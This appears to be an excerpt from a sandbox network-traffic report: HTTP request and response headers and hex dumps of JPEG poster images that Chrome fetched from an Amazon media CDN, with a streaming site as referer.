                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 21 10 2b 6d 5d 97 9c 10 28 26 59 91 8c 00 11 5c 7b 15 0b 9f a7 63 c5 79 9b c2 a8 fb 23 3d dd c4 c1 b3 8e 86 88 ef 59 25 18 44 53 62 81 84 23 73 8c c4 6c 57 38 69 80 42 20 79 4c 60 8c 20 a8 64 e4 ae 82 26 15 3a 59 a8 a9 5d 61 a0 47 92 39 24 8d 92 bd 5a cd c7 a3 7c 4a de c3 69 84 8c ad d9 c5 11 0b 05 5d c7 3a c8 ba 1d 87 dd 18 1b 69 82 db 59 36 9b e2 47 05 d0 b2 31 1e 9b d5 6e e1 8d c5 7b a6 c7 4c 5c 36 9a 77 41 7c 23 3d 16 43 65 fe 11 42 7a 23 b5 5c fd 3a d2 a7 2f e5 ac 5e d8 9b 32 65 22 e9 59 0a f4 c9 5c 70 45 6e 7e 28 1a ac 1a d1 8f 56 77 3a c4 f4 89 1e c1 c9 80 88 ac aa a3 bd 75 1e b7 a8 ed 52 f7 53 d4 9b b4 29 fa 6a 5d 75 ad 43 e2 ff 00 a9 51 dd 11 fc 84 14 09 fd f3 8e d9 a6 35 99 c4 fd 04 35 85 8c e7 50 6a 86 9c fc ac 52 b9 fe d9 8d 67 e9 dd 03 84 29
                                                                                                                                                                                          Data Ascii: !+m](&Y\{cy#=Y%DSb#slW8iB yL` d&:Y]aG9$Z|Ji]:iY6G1n{L\6wA|#=CeBz#\:/^2e"Y\pEn~(Vw:uRS)j]uCQ55PjRg)
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 54 2d 21 cd ac 6e f7 ef 4b 73 4f 81 51 45 c1 8f b4 46 78 a8 2d d8 f9 df 62 97 8f 9f be 94 97 9a 2f 74 fc 94 7b 3a fb 1d eb 99 4f 9a 23 4f ec 95 89 12 7f 83 d8 53 25 ae ec da 76 2d 50 52 7c d6 93 a9 27 7a ec 25 3d 81 fe 20 3f 2c 5f 2f 16 a6 f1 b7 c5 07 c0 49 40 a0 5d 50 05 d5 74 0d 5f 41 04 5c 8e 2a ce bd 0b c3 21 7e c7 b4 14 5b 32 c2 d4 9d ce ea 84 f4 dd ca 7d 85 08 98 24 08 27 a3 58 5a 2d 6d c7 03 96 c5 34 5a fe ee 3c 11 05 3b ab 76 1f d3 5e 4b e1 a2 1a 06 c4 29 45 f4 a6 ea c5 04 33 da 3d 25 1f fa ca 03 41 57 01 70 93 5d 0e d5 05 9a f4 ec 98 92 d3 0e ad ab 11 6a f5 2a 61 6f 20 0b d5 d6 a1 63 22 92 15 37 5e e0 0d b7 9e 95 00 b3 5d 32 f1 34 a6 d7 57 00 39 ef 6e f5 63 67 1e d5 88 d0 67 48 1e cf 44 79 ee 2f 06 a2 1f 3e d1 a9 f1 7f 05 9f 79 3b 56 8a ad d2 18
                                                                                                                                                                                          Data Ascii: T-!nKsOQEFx-b/t{:O#OS%v-PR|'z%= ?,_/I@]Pt_A\*!~[2}$'XZ-m4Z<;v^K)E3=%AWp]j*ao c"7^]24W9ncggHDy/>y;V
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: c6 d6 c2 8e 21 6c e8 c6 c6 04 25 5d 08 bc 59 ce 32 c2 f7 99 d3 d4 bd e7 da 7e 7d 79 cd 2f ab 12 b4 e6 33 6a 73 24 cc b3 86 17 b7 5a b1 a9 89 11 91 1b 4f b7 a2 21 34 ae 4c fe 30 fe d5 df 81 53 07 65 59 86 48 4b 5c 73 da b4 fd 06 19 de da 4b 82 13 8d fd 32 21 c4 a4 24 85 92 d2 38 a2 4b 7a a0 16 4f 52 fd bd 23 77 de 1f af 50 98 0d 74 ca cd 45 44 19 0c 1d 53 8e 55 6c 0c c5 bc 54 e5 78 d7 64 43 f9 7a fc ef c7 f1 81 e6 4c 02 dd f1 87 41 ba 87 1b 2d 36 b7 c9 1d f7 1d b6 45 23 60 86 cb 99 ac 4c da 99 4c 60 f5 83 31 2b a9 cf 9c f7 f4 b6 1d 6e f3 f5 04 f7 c1 b1 b6 e8 c0 e3 0b 50 c4 ac b6 62 67 67 45 c9 50 4b 74 fb 07 e2 8b 22 64 24 ea 36 a2 d0 02 96 0e 8f 17 bb e8 fe 63 bf f1 91 dd 1b fb dc 75 2a 1d de 9e 72 9b f6 ec a3 b9 53 30 01 ba 44 6e 5b e3 49 a5 02 82 f0 65
                                                                                                                                                                                          Data Ascii: !l%]Y2~}y/3js$ZO!4L0SeYHK\sK2!$8KzOR#wPtEDSUlTxdCzLA-6E#`LL`1+nPbggEPKt"d$6cu*rS0Dn[Ie
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a8 9b c7 24 5a c2 30 36 a8 92 cd 8d 9c 7e 0e 3f 82 88 9b f4 e1 c5 0c 16 70 e0 5a 86 5b 3b 71 9a 06 d1 63 b6 91 ad 6e f5 5e f9 ea 99 ec b5 3a 18 b1 91 1d f2 3d 30 73 13 48 72 e8 4b 7f 2f de b4 44 93 1b 1b f7 fa 72 a4 00 10 78 3c 54 31 16 66 91 a3 c1 7f 98 fd 52 5d fa 5a 7b 90 54 12 2f b4 b2 fe fe 2b 9f e3 ce d4 dd 66 e3 08 c7 2c f3 52 83 c5 19 f9 78 8a 0d af 9e 2a e3 39 fc 79 f1 50 44 6f a3 7c d1 1f 8e fd f3 8f 12 e6 90 4e 0c b3 35 f2 8c f2 37 eb 48 b2 5d 73 3b a2 e7 16 c9 18 a2 87 53 84 70 9f 73 44 d9 65 64 e6 31 0f 38 3f ef 34 4e 75 c6 60 c4 75 18 78 a4 2a 5e 2b 78 43 a3 4c c8 71 8b 8d 7d ce 95 5d cb 37 c5 f7 a4 b0 3a d7 9a 30 68 6c 69 d7 c6 d5 9a 7e f5 a2 6d b5 ef f7 ef 15 11 8e 9b 77 fa fc d3 2c cf e5 e2 fe f4 10 d1 3b 5a 7a d0 f4 a1 75 f1 59 4f c1 fb
                                                                                                                                                                                          Data Ascii: $Z06~?pZ[;qcn^:=0sHrK/Drx<T1fR]Z{T/+f,Rx*9yPDo|N57H]s;SpsDed18?4Nu`ux*^+xCLq}]7:0hli~mw,;ZzuYO
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a5 53 ca 9c 7d 65 9c f2 cf 66 30 db 63 45 4e 3b ba 06 65 32 d2 ee 52 52 66 e6 de bb 5c 52 55 28 f8 fe 6a c6 43 8f 87 0b 9a a1 03 f7 83 8f d4 e7 97 6f f0 ce fc 21 84 07 9f e5 f9 af 3a 39 f9 4c 22 d7 f9 8a ae 2f e9 df d5 fe a7 0d 26 00 c5 5d 8f b2 6e 57 cb 3f 87 22 07 fa 46 d8 04 fd a1 73 5f 2f 5d d7 61 3e 53 c0 8d 44 19 d3 00 55 1d 00 2b 95 7e 9c d4 0a 3e 05 c2 7b 99 b1 c2 7e 78 3f a9 e1 60 7a 48 f8 3d d6 e0 fa f1 f3 46 63 11 e8 42 a0 20 80 94 17 0c ed 21 38 74 18 7b f2 c0 62 22 fc 6e a5 aa 08 ca be af ec c9 25 7f f5 8c 58 7f cc 5c 03 4a 58 a1 44 0e 31 7e 56 6a f2 9f a7 d7 bf 10 03 d4 d2 c1 b5 cc 0e 4e 28 63 40 2e 2a f9 3e fd 81 08 77 c1 3f 14 b3 e5 ad f7 ba 01 c2 4b a5 cf e3 11 e0 d6 f7 8c b7 a3 e3 9b b7 c0 b7 0b 45 ad 36 6f de 02 8f 9e 37 64 65 c4 3d 43
                                                                                                                                                                                          Data Ascii: S}ef0cEN;e2RRf\RU(jCo!:9L"/&]nW?"Fs_/]a>SDU+~>{~x?`zH=FcB !8t{b"n%X\JXD1~VjN(c@.*>w?KE6o7de=C


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          100192.168.2.1649836151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC684OUTGET /images/M/MV5BYTk3OWJmZWUtYmZmZi00YmI5LWE4ZWQtODE0YjI0Mzk4MDkxL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 42582
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: f885793a-e2f4-4664-a951-c4111ebfdeb8
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 18 Jan 2017 21:14:09 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 16 Aug 2044 23:43:17 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1003050
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100026-IAD, cache-nyc-kteb1890033-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 a5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 08 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df 6b e6 d8 38 00 d3 26 ad 14 4a ca 38
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5k8&J8
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a4 f4 ba 18 67 26 87 12 89 c4 96 c7 a1 50 66 de 66 6e 53 c3 95 bf cb 49 ea 22 4b 1c de 8f 75 92 4f e4 09 8e 62 d4 da bb 99 d1 84 5b a8 2f b2 da d5 ae 09 83 f5 29 e5 a5 43 9f 71 1d ce f3 88 6a 81 fa 48 1c e6 a2 aa 3e fa 00 3b 01 2e 91 50 e5 8e 54 f9 41 1c 09 25 83 be 17 2c d2 e3 ab 08 c0 ac bd 14 d1 ab ba b5 7e 76 04 a7 1a cc ac aa fd 2d 62 82 43 57 8b ec 46 e2 d5 5a c9 15 00 dd 4d c9 b9 63 dd d7 63 67 8a 9f 50 86 7f 43 77 c8 7a de 57 68 41 ba b5 9f 4b 90 ef dc f8 b0 ba 9e 7c bc b4 2d b4 e8 e2 88 c6 4e af b3 2e c1 89 f4 2a fc b7 69 65 56 5c 1a 81 f2 56 dc 46 68 78 4a 19 60 a9 ae bd 4f a9 97 25 a4 b6 c6 f4 58 39 78 c4 05 8c fa 12 49 a2 75 aa f9 ed ef 9b 76 c2 12 e1 81 d2 52 e4 56 a8 91 9f a0 22 99 c2 49 d9 f3 3d 1f 25 15 62 e8 f5 f0 53 df 19 bf d4 ad 3b bf
                                                                                                                                                                                          Data Ascii: g&PffnSI"KuOb[/)CqjH>;.PTA%,~v-bCWFZMccgPCwzWhAK|-N.*ieV\VFhxJ`O%X9xIuvRV"I=%bS;
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: e4 b9 d7 5a e6 fa 1d 2a e3 7f 41 8e 9c 5f 90 e7 a2 8e 8f 3c 73 dc a9 11 b8 bc 59 43 d6 d4 9e cc f6 58 d8 8e bb f3 79 a5 3d d4 e8 ff 00 49 42 73 0c 4b a5 3d 6d fc 1c 55 11 a6 a5 c3 92 3e ae 02 dc b3 58 65 6a ad f2 52 d5 61 12 6a 4a 28 d6 25 45 7a a6 67 61 72 c8 64 71 6e 74 e8 10 ce 37 b9 d7 03 a2 cb 8a a7 95 6b a4 0a 2d 78 7c 49 8e f7 2c b8 5b 24 2d 82 c1 37 23 e0 70 ec dc 5e aa 4f 3a df 75 53 eb 3a 97 91 c7 91 12 25 3f 7d 2c 6a ef df 77 29 df be 5e 75 1f 7d ce 52 fe f9 bc a6 be f9 ca e4 8f be 6a c8 73 ef 98 f4 a7 ef 98 ae b9 f7 dc bc 6f ef 91 51 f7 df 72 2d cf be 63 be 4f df 35 7e 63 ef 95 a9 e7 df 37 bb 17 ef 97 98 5f df 39 a9 87 f7 ce 4f ff c4 00 30 10 00 02 01 03 03 02 06 02 03 00 02 02 03 00 00 00 01 02 03 00 04 11 12 13 21 05 31 10 14 20 22 32 41 23
                                                                                                                                                                                          Data Ascii: Z*A_<sYCXy=IBsK=mU>XejRajJ(%Ezgardqnt7k-x|I,[$-7#p^O:uS:%?},jw)^u}RjsoQr-cO5~c7_9O0!1 "2A#
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 4e 1e b5 06 01 96 e6 db 49 2f 18 3a bb 62 a1 ba 92 0f 8c 1d 49 24 ef 7c f8 85 aa 10 ac e0 35 d5 b4 71 28 2b 51 46 5c 36 01 c6 08 b9 9b 7a 46 71 0f 94 d2 ba a2 b8 80 00 89 d5 07 bd 0d 47 df c0 b7 d5 01 f6 58 eb 20 55 cc 5b 52 3a d3 54 7d 41 24 1a 27 b9 48 94 8d a1 21 8b de b1 a6 da 2a 8b c0 36 a4 cc 49 b6 aa be 8c d1 a2 71 dc be b2 65 a9 06 39 ae f5 04 e6 1a 66 0d c8 9a dc 3f 20 e5 38 61 fe d6 2b 74 f0 a7 22 87 7c 09 2d 65 5d 20 f4 e1 b7 2b 2b 5c db 18 9f 4a 8b 29 ab c9 4d 51 40 eb 24 7a ba 84 0d 28 5d 26 09 22 20 b6 45 28 cf 0b 2d 9c 85 6a 3b 29 43 29 ab fb 73 2e 96 45 b0 95 88 06 5b 29 63 ac 1a 82 d1 99 93 73 cf c2 e7 48 bc f7 7b 7d 77 97 3b e7 4a a9 db 3c f6 e2 88 c7 82 92 39 0b 20 7a 61 f5 4d 68 0e 0c 6d 94 f6 b4 66 b7 04 7e ea 96 4d c4 d6 b0 76 c1 b6
                                                                                                                                                                                          Data Ascii: NI/:bI$|5q(+QF\6zFqGX U[R:T}A$'H!*6Iqe9f? 8a+t"|-e] ++\J)MQ@$z(]&" E(-j;)C)s.E[)csH{}w;J<9 zaMhmf~Mv
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 95 69 25 13 1d a1 3c 26 26 c3 b1 7f eb ce 4a d4 d2 e0 7e 28 7a 6c 51 28 06 1b 78 e1 72 e9 d4 2d 9a 0e 2b 18 e3 c6 ea 33 81 50 c8 0f 02 3f af 56 bd c3 aa a0 84 cc e1 04 68 23 01 56 44 12 2b 29 f3 8a 84 a4 92 5f a2 8f 6a 45 e6 b7 59 d8 fb bc 2c c6 84 06 a5 b8 2b ee a9 0a c0 14 47 5c d2 e7 ec 9a 03 43 63 c6 75 2c bc 79 53 26 25 02 09 31 c4 4d b0 0d 5b 92 ef 12 1a 3f 13 5d 5e 4d 22 11 49 d4 32 70 63 7d 60 1a 2c 07 77 9d 22 c6 a5 03 4e a3 e6 94 60 52 b6 7c 0f 85 c1 e3 4f 87 4e 83 6d 35 78 75 1b ad a5 d0 b4 e3 8a 86 5d b6 e6 7b 6d 67 5a b4 6f 8c 52 af 01 6a 09 a2 b7 12 35 08 35 f3 27 6f 44 bf 28 05 16 03 02 b3 e1 0d b1 cb 68 10 ce 2b 72 65 f9 58 65 da 46 24 e2 9f 8d 02 af db 55 c0 14 f0 a7 39 b6 77 23 dd 76 ec 8d 9a 8e dc 63 94 84 a3 d1 b7 5c ce a2 07 0a be 89
                                                                                                                                                                                          Data Ascii: i%<&&J~(zlQ(xr-+3P?Vh#VD+)_jEY,+G\Ccu,yS&%1M[?]^M"I2pc}`,w"N`R|ONm5xu]{mgZoRj55'oD(h+reXeF$U9w#vc\
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 4d 2e 49 66 f8 07 35 22 80 91 9f 1e 9b ff 00 c8 8a 9e 74 4e 08 63 dd b5 0a b7 b2 88 c6 0b 34 aa 8f cf 50 97 45 bc 84 11 8f 07 fc 36 02 ac a2 de b8 85 6b ca c4 c3 4d 2d aa b1 f6 c3 d3 a1 87 24 dc db c5 b6 e4 4d 6c df 3a 31 e8 3c a9 dc 0c 95 6d 6a b1 61 63 f2 2f e9 70 1b 19 69 74 ad 5c db 28 8d f1 9a 8e d9 dc 6b a9 6d 59 63 d4 54 68 cc 66 bb ea 5a d1 a0 e0 75 11 aa 31 20 e9 f0 47 3c 11 46 6e fa 31 57 93 6a 1e 95 2c cd a4 4b d2 da d8 e2 4c 24 79 02 dc 21 64 0d 3d e5 b6 15 05 b4 d1 49 9d b8 57 42 e2 ba 9a 3c c6 18 51 3a 42 0f 9b f4 d8 31 5d 52 06 da 89 17 a2 2e a9 e4 6a 93 4b 7b 19 c0 f6 b3 e3 3d 81 e7 06 44 59 46 1e f6 d6 21 0b d5 ac 1b 23 2c c4 48 31 4c 70 09 ad 59 e6 94 fc bc 3b 9a 7b e2 0b 66 de d2 49 21 1b b7 4c ad 14 f1 04 b3 0b a5 a7 de 05 c4 95 3c f1
                                                                                                                                                                                          Data Ascii: M.If5"tNc4PE6kM-$Ml:1<mjac/pit\(kmYcThfZu1 G<Fn1Wj,KL$y!d=IWB<Q:B1]R.jK{=DYF!#,H1LpY;{fI!L<
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 45 29 49 c8 9d da bd 78 e9 45 14 30 6b e1 1e 49 65 92 dd 86 78 c6 92 e4 e7 99 ff 00 c3 a2 01 1b 43 17 44 e3 38 ce 33 8c e3 38 fc 31 21 49 12 47 73 61 33 73 4b 56 93 c3 2c 52 43 56 18 22 f6 f2 09 61 8c 75 02 64 66 2a 0c f1 81 c9 f0 c0 f2 17 59 f4 cb 14 52 cf 36 b2 af 8e bf 73 c6 3d e9 1e cc 9d 40 e0 01 9c 7e 38 fc 9f c7 91 39 e3 0b aa fd b5 50 dd 88 35 a0 07 e1 42 23 97 32 88 23 40 d2 26 de 98 90 36 09 23 75 e7 15 15 54 04 63 c2 93 89 1a b9 03 38 ce 33 8f c4 96 44 6a 48 4f 50 44 4f 12 2c 8a eb d9 0f c0 cf e3 61 23 39 94 bc 71 ac 8c c1 0b 88 61 a5 04 dc 22 d9 02 bb 48 30 c8 d2 b9 38 aa 49 ec 7c a7 c4 20 04 ba c8 22 92 c9 74 a6 55 35 f1 30 90 2e 71 9c 7e 2d 6f 26 32 b2 c5 53 65 d0 f8 e4 9f 5c b2 fe e8 b4 6c c2 7b c3 fe 62 6f 1b 47 32 48 3c 45 32 1a 0e 64 11
                                                                                                                                                                                          Data Ascii: E)IxE0kIexCD8381!IGsa3sKV,RCV"audf*YR6s=@~89P5B#2#@&6#uTc83DjHOPDO,a#9qa"H08I| "tU50.q~-o&2Se\l{boG2H<E2d
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: c1 c0 1d 72 fa 4a c2 35 8c c1 24 6e 15 e4 b1 24 cf dd ea eb 63 95 18 c9 37 a1 89 97 bd 6a ba 18 eb bc a1 7c 3e e6 fd 85 75 32 ad d3 1d 75 dc d5 8a cf 95 76 d4 ed d9 8a b9 d7 4b 04 b1 c6 3c aa 32 bd 36 98 b7 51 ae 9c 7c 93 aa 9f 8e f8 35 56 18 76 c1 ae 9f e7 2a d1 30 a1 ed 2f ac ac 30 01 4f ab 2f 10 38 7d dc f3 bf 69 7d f2 8e 3b b6 d2 68 fe 20 5d fd 84 1c 29 f5 15 a3 f3 87 7f 73 e7 af 89 3b 19 15 ec 22 80 a9 4f 69 6a bf 97 c5 2e ee 76 54 12 d7 b8 ef d8 b3 ee e5 80 29 ae 3d 43 74 37 7c ff 00 91 5d 6f d4 a6 ee ea fc 29 df 5e e7 9c 3e a3 be 7e d9 fe 70 11 fd 9b 4a 0f e8 6e c8 47 03 cb 2b e7 b6 7e 39 6e 90 2f c9 3e 02 49 ce d1 e0 70 3e 81 2c 3a a9 ac c5 8e 45 58 a4 32 73 20 71 c0 4f 39 1f 04 b8 c2 73 9f c1 fb f9 e7 f3 ce 73 84 e7 85 f8 e7 3c 4c 7e 33 c4 d8 16
                                                                                                                                                                                          Data Ascii: rJ5$n$c7j|>u2uvK<26Q|5Vv*0/0O/8}i};h ])s;"Oij.vT)=Ct7|]o)^>~pJnG+~9n/>Ip>,:EX2s qO9ss<L~3
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 96 5f 55 59 35 18 b1 7a eb 43 72 90 13 76 b1 42 af e2 09 79 34 e0 11 36 ec 6b cc 5d 95 aa c8 c7 bd 9d 3a 04 e2 a2 3f 38 cb 3a 24 58 2e e7 6a 99 d6 b2 68 3d 28 c1 54 cf d1 90 e7 fb 0d de 2f 4a 78 22 d7 f8 ed 65 dc 5b 40 a2 0f 64 a1 9b b6 e5 f6 de ec 5a 0d c6 2b 5d ad 25 aa 7d 65 f9 ce 50 f2 07 d2 03 80 42 4e cb 0a c3 ab 12 56 26 13 12 b2 e2 a2 03 ac 8f 78 7e ef d6 3d cf 55 b5 1b 2a 66 4b 39 9c f2 2d 2f 60 8b c1 5b 6a ea a5 ca b5 bb 58 ba 12 6c 97 0f 5e 55 62 e3 04 fa 2d 3b 8b 4a 96 7a ec 6a ec 56 9f de a8 d7 29 e0 c4 ef 50 f6 55 ad 93 1c 7c 7d 20 26 7a 04 02 a1 61 03 16 6d fb 59 3c 6b 9c d0 68 b5 55 ad 93 13 ca ae 69 82 d0 80 4d 6d 6d 4d 78 fa d3 0f 89 9e 27 77 66 22 a4 a2 3f 42 f8 8c d7 2d 94 1f ec 80 b0 9b 01 27 13 a7 b6 c1 37 0d 54 14 bc 22 36 95 17 61
                                                                                                                                                                                          Data Ascii: _UY5zCrvBy46k]:?8:$X.jh=(T/Jx"e[@dZ+]%}ePBNV&x~=U*fK9-/`[jXl^Ub-;JzjV)PU|} &zamY<khUiMmmMx'wf"?B-'7T"6a
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 24 e7 23 85 bd ca 1a f5 99 54 53 ac e8 4c 58 86 34 20 c8 da 39 a9 e3 42 7b 94 10 c2 36 2f ea 45 d7 05 6a 94 30 ae cd e1 b2 c8 96 36 2f a4 db ad 6a c1 21 fc bf 0a 20 11 70 a2 60 ff 00 c6 48 be 3e 54 4f 9a 63 87 72 08 76 21 bb e8 56 1a 67 c1 2b 85 a7 96 0f 13 4b 3b 59 82 b0 ef 1f 0a cb 6d 59 50 fa 82 a4 47 a2 ac 25 19 88 43 f0 56 3e e5 da 39 37 50 71 54 82 1e 2b 47 35 fb b9 2a 0a 95 62 f2 fb e0 38 a2 e1 2f 9c 0f 2a 91 4d 76 28 76 c8 9d 4a 9d 9c 0c 38 7d 61 33 d4 b0 50 d7 31 f9 56 20 cf 62 a8 56 79 7a b4 23 23 51 62 b4 a1 5a a9 4a 88 38 3b 90 68 77 95 7f 09 2f 17 b9 9e e5 53 d3 95 41 6a 0f 9c d3 62 a9 50 eb a0 51 6a 1c d4 3a cc d7 9a 21 bb 28 f0 c1 7c 30 fd a1 fd ff 00 d8 4d ea 6c d5 80 b3 da a7 0d f7 20 f0 9a dc 84 ef a2 1a ea 7b c4 82 14 38 f1 1e b4 a2 f7
                                                                                                                                                                                          Data Ascii: $#TSLX4 9B{6/Ej06/j! p`H>TOcrv!Vg+K;YmYPG%CV>97PqT+G5*b8/*Mv(vJ8}a3P1V bVyz##QbZJ8;hw/SAjbPQj:!(|0Ml {8


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          101192.168.2.1649837151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC413OUTGET /images/M/MV5BMjAzNzgzNDg5Nl5BMl5BanBnXkFtZTcwODYwNTIyMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 36109
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: cff704b6-d3a3-454a-b597-0d5487480d79
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Fri, 14 Mar 2008 06:50:34 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 01 Dec 2044 23:22:05 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          Age: 633239
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100067-IAD, cache-nyc-kteb1890021-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 db 00 fe 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 07 01 00 08 ff c4 00 4b 10 00 01 03 03 03 03 02 03 04 07 05 05 06 05 05 01 01 02 03 11 00 04 21 05 12 31 06 41 51 13 61 22 71 81 07 14 91 a1 15 23 32 b1 c1
                                                                                                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"K!1AQa"q#2
